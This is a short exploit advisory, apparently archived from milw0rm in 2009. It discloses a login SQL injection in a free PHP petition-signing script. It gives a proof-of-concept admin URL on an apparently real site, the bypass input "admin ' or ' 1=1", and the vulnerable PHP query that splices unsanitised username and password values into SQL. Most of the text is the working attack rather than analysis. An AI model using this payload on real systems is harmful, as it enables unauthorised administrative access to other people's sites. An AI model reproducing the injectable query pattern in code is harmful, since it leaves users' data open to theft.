|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_w_, ( : / (_) / ( . ###################################################### # Free PHP Petition Signing Script Release # # Login SQL injection # ###################################################### # Qabandi | iqa[a]hotmail.fr # From Kuwait, Peace. Salamz: Killer Hack, Ghost-R00t, Mr.Mn7os, Cyb3rT ###################################################### Download: http://www.rediscussed.com/2008/01/18/free-php-petition-signing-script-release/ ------------------------------------------------------ -:PoC:- http://usa-homeland.org/pet/signing_system-admin Username: admin ' or ' 1=1 Password: nothing ------------vuln--code---------(./signing_system-admin/index.php) $query = mysql_query("SELECT username,password FROM `accounts` WHERE username='$username' AND password='$password'", $conn) or die(mysql_error()); ------------------------------------ # milw0rm.com [2009-03-27]